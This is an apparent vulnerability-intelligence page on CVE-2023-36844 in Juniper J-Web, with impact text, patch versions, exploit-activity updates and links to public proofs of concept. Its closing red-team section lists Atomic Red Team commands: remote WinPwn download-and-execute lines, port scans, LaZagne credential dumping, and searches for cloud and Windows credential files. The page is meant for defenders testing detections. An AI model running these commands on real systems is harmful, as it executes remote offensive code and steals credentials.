CVE-2023-36844
Overview
This vulnerability is a PHP External Variable Modification flaw rooted in improper handling of environment variables within the J-Web management interface of Juniper Networks Junos OS on EX Series devices. The issue arises from insufficient validation of PHP environment variables, allowing an unauthenticated network attacker to manipulate critical environment settings. The affected component is the PHP environment variable processing in the J-Web interface, specifically in the web authentication operation handler.
Vulnerability Description
A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series allows an unauthenticated, network-based attacker to control certain, important environment variables. Using a crafted request an attacker is able to modify certain PHP environment variables leading to partial loss of integrity, which may allow chaining to other vulnerabilities. This issue affects Juniper Networks Junos OS on EX Series: * All versions prior to 20.4R3-S9; * 21.1 versions 21.1R1 and later; * 21.2 versions prior to 21.2R3-S7; * 21.3 versions prior to 21.3R3-S5; * 21.4 versions prior to 21.4R3-S5; * 22.1 versions prior to 22.1R3-S4; * 22.2 versions prior to 22.2R3-S2; * 22.3 versions prior to 22.3R3-S1; * 22.4 versions prior to 22.4R2-S2, 22.4R3; * 23.2 versions prior to 23.2R1-S1, 23.2R2.
Impact
An unauthenticated attacker can exploit this vulnerability to gain partial control over PHP environment variables, which may be leveraged to execute arbitrary code on the affected device. No user interaction or credentials are required to exploit this flaw. Successful exploitation can lead to unauthorized command execution, compromising device integrity, enabling further attacks such as lateral movement or persistent access, and potentially disrupting network operations controlled by the Junos OS device.
Solution
Juniper Networks has released security updates addressing this vulnerability in Junos OS versions 20.4R3-S9, 21.2R3-S7, 21.3R3-S5, 21.4R3-S5, 22.1R3-S4, 22.2R3-S2, 22.3R3-S1, 22.4R2-S2, 22.4R3, 23.2R1-S1, and 23.2R2. Administrators should apply the appropriate patches as detailed in Juniper Security Advisory JSA72300 available at https://supportportal.juniper.net/JSA72300. No alternative workarounds are specified; updating to the fixed versions is required to remediate the issue.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in Juniper Networks' J-Web interface of the Junos OS on EX Series devices is characterized by the ability of an unauthenticated, network-based attacker to manipulate PHP environment variables. This exploitation is facilitated through specially crafted requests, which can lead to a partial loss of integrity within the system. The PHP External Variable Modification vulnerability allows attackers to alter critical environment variables that are essential for the proper functioning of applications and services hosted on the affected devices. The implications of such modifications can be severe, as they may enable further exploitation by chaining this vulnerability with other existing vulnerabilities, amplifying the potential impact.
Attack vectors for this vulnerability are primarily network-based, allowing attackers to initiate exploitation without requiring authentication. This characteristic significantly broadens the attack surface, as any device connected to the network could potentially be targeted. An attacker could send crafted requests to the J-Web interface, manipulating environment variables to execute arbitrary code or disrupt service functionality. Given the nature of network devices, successful exploitation could lead to unauthorized access, data leakage, or even service disruption, depending on the attacker’s objectives and the specific environment variables targeted.
The real-world impact of this vulnerability is substantial, particularly for organizations relying on Juniper Networks' EX Series switches for critical network operations. The ability to modify environment variables can compromise the integrity and availability of network services, leading to operational disruptions and potential data breaches. Businesses may face significant financial losses due to downtime, remediation costs, and reputational damage. Furthermore, if attackers leverage this vulnerability to gain a foothold in the network, they could escalate their privileges and access sensitive information, resulting in compliance violations and legal repercussions.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regularly updating Junos OS to the latest versions that address this vulnerability is crucial. Network monitoring tools should be employed to detect unusual traffic patterns or unauthorized access attempts targeting the J-Web interface. Additionally, organizations should consider implementing strict access controls and network segmentation to limit exposure to critical systems. Employing intrusion detection systems (IDS) can also help identify and alert on potential exploitation attempts. Regular security assessments and penetration testing can further enhance the organization's ability to identify vulnerabilities before they can be exploited.
In conclusion, the PHP External Variable Modification vulnerability in Juniper Networks' J-Web interface poses a significant risk to organizations utilizing affected versions of the Junos OS on EX Series devices. The potential for unauthorized manipulation of environment variables can lead to severe consequences, including data breaches and service disruptions. By adopting proactive detection and mitigation strategies, organizations can safeguard their networks against this and similar vulnerabilities, ensuring the integrity and availability of their critical infrastructure.
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2023-36844, indicating increased adversary interest and potential exploitation attempts targeting Juniper Networks Junos OS on EX Series devices. This uptick in telemetry corresponds with the recent inclusion of this vulnerability in the KEV catalog, underscoring its growing prominence within the threat landscape. Although the exploitability remains complex, the emergence of multiple proof-of-concept exploits—particularly those chaining CVE-2023-36844 with adjacent vulnerabilities to achieve remote code execution—amplifies the risk profile. Our sensors confirm that while the overall exploit trend remains stable, the qualitative increase in sightings suggests adversaries are actively probing for weaknesses or preparing for targeted campaigns. This development elevates the threat level from moderate concern to a heightened vigilance posture, as the potential for successful exploitation could lead to significant integrity breaches and unauthorized control over critical network infrastructure.
Update 2 — June 19, 2026
CSURFACE threat intelligence has detected a discernible uptick in exploitation attempts targeting CVE-2023-36844, accompanied by the emergence of new proof-of-concept exploits that facilitate chaining with related vulnerabilities to achieve remote code execution on Juniper Junos OS devices. Although the EPSS score has slightly decreased, this metric does not fully capture the qualitative increase in adversary activity and the broader availability of sophisticated exploitation tools. Our telemetry indicates a marked escalation in reconnaissance and probing behaviors, suggesting that threat actors are intensifying efforts to identify vulnerable Juniper EX Series devices for potential compromise. This shift underscores a growing operational interest that could precede targeted intrusion campaigns or opportunistic exploitation. Consequently, the threat level associated with CVE-2023-36844 should be elevated to reflect an increased likelihood of exploitation attempts that may lead to significant integrity violations and unauthorized control over critical network infrastructure.
Update 3 — July 06, 2026
CSURFACE threat intelligence has detected a slight increase in activity targeting CVE-2023-36844, accompanied by the emergence of additional proof-of-concept exploits that demonstrate chaining capabilities with related Juniper vulnerabilities to achieve remote code execution. While the overall exploitation trend remains stable, the availability of sophisticated exploit tools, including a Metasploit module capable of privilege escalation through J-Web authentication token theft, signals enhanced attacker capability and operational interest. This development is significant for defenders as it lowers the technical barrier to exploitation and increases the risk of successful intrusions against vulnerable Juniper EX Series devices. Consequently, the threat level associated with CVE-2023-36844 should be reassessed to reflect a heightened likelihood of exploitation attempts that could lead to unauthorized control and integrity compromise within critical network infrastructure.
Affected Products (94)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Juniper | Junos | All |
cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:*
|
|
|
Juniper | Junos | 20.4 |
cpe:2.3:o:juniper:junos:20.4:-:*:*:*:*:*:*
|
|
|
Juniper | Junos | 20.4 |
cpe:2.3:o:juniper:junos:20.4:r1:*:*:*:*:*:*
|
|
|
Juniper | Junos | 20.4 |
cpe:2.3:o:juniper:junos:20.4:r1-s1:*:*:*:*:*:*
|
|
|
Juniper | Junos | 20.4 |
cpe:2.3:o:juniper:junos:20.4:r2:*:*:*:*:*:*
|
|
|
Juniper | Junos | 20.4 |
cpe:2.3:o:juniper:junos:20.4:r2-s1:*:*:*:*:*:*
|
|
|
Juniper | Junos | 20.4 |
cpe:2.3:o:juniper:junos:20.4:r2-s2:*:*:*:*:*:*
|
|
|
Juniper | Junos | 20.4 |
cpe:2.3:o:juniper:junos:20.4:r3:*:*:*:*:*:*
|
|
|
Juniper | Junos | 20.4 |
cpe:2.3:o:juniper:junos:20.4:r3-s1:*:*:*:*:*:*
|
|
|
Juniper | Junos | 20.4 |
cpe:2.3:o:juniper:junos:20.4:r3-s2:*:*:*:*:*:*
|
|
|
Juniper | Junos | 20.4 |
cpe:2.3:o:juniper:junos:20.4:r3-s3:*:*:*:*:*:*
|
|
|
Juniper | Junos | 20.4 |
cpe:2.3:o:juniper:junos:20.4:r3-s4:*:*:*:*:*:*
|
|
|
Juniper | Junos | 20.4 |
cpe:2.3:o:juniper:junos:20.4:r3-s5:*:*:*:*:*:*
|
|
|
Juniper | Junos | 20.4 |
cpe:2.3:o:juniper:junos:20.4:r3-s6:*:*:*:*:*:*
|
|
|
Juniper | Junos | 20.4 |
cpe:2.3:o:juniper:junos:20.4:r3-s7:*:*:*:*:*:*
|
|
|
Juniper | Junos | 20.4 |
cpe:2.3:o:juniper:junos:20.4:r3-s8:*:*:*:*:*:*
|
|
|
Juniper | Junos | 21.1 |
cpe:2.3:o:juniper:junos:21.1:r1:*:*:*:*:*:*
|
|
|
Juniper | Junos | 21.1 |
cpe:2.3:o:juniper:junos:21.1:r1-s1:*:*:*:*:*:*
|
|
|
Juniper | Junos | 21.1 |
cpe:2.3:o:juniper:junos:21.1:r2:*:*:*:*:*:*
|
|
|
Juniper | Junos | 21.1 |
cpe:2.3:o:juniper:junos:21.1:r2-s1:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Junos OS PHPRC Environment Variable Manipulation RCE
exploits/freebsd/http/junos_phprc_auto_prepend_file
|
Jacob Baines, Ron Bowes, jheysel-r7 +1 | Unknown | - | View |
GitHub PoCs (4)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
watchtowrlabs/juniper-rce_cve-2023-36844
|
watchtowrlabs | 115 | 28 | 2023-08-25 | View |
|
r3dcl1ff/CVE-2023-36844_Juniper_RCE
A Proof of Concept for chaining the CVEs [CVE-2023-36844, CVE-2023-36845, CVE-2023-36846, CVE-2023-36847] to achieve Rem...
|
r3dcl1ff | 5 | 3 | 2023-09-24 | View |
|
Ap0dexMe0/CVE-2023-36844
Perform With Massive Juniper Remote Code Execution
|
Ap0dexMe0 | 0 | 0 | 2023-09-20 | View |
|
ThatNotEasy/CVE-2023-36844
Perform With Massive Juniper Remote Code Execution
|
ThatNotEasy | 0 | 0 | 2023-09-20 | View |
Threat Feed
15 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-77 | Manipulating User-Controlled Variables |
30%
|
High | Very High |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-36844 |
| supportportal.juniper.net |
GitHub CVE
vendor-advisory
mitigation
|
https://supportportal.juniper.net/JSA72300 |
| packetstormsecurity.com |
GitHub CVE
|
http://packetstormsecurity.com/files/174865/Juniper-SRX-Firewall-EX-Switch-Remote-Code-Execution.html |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-36844 |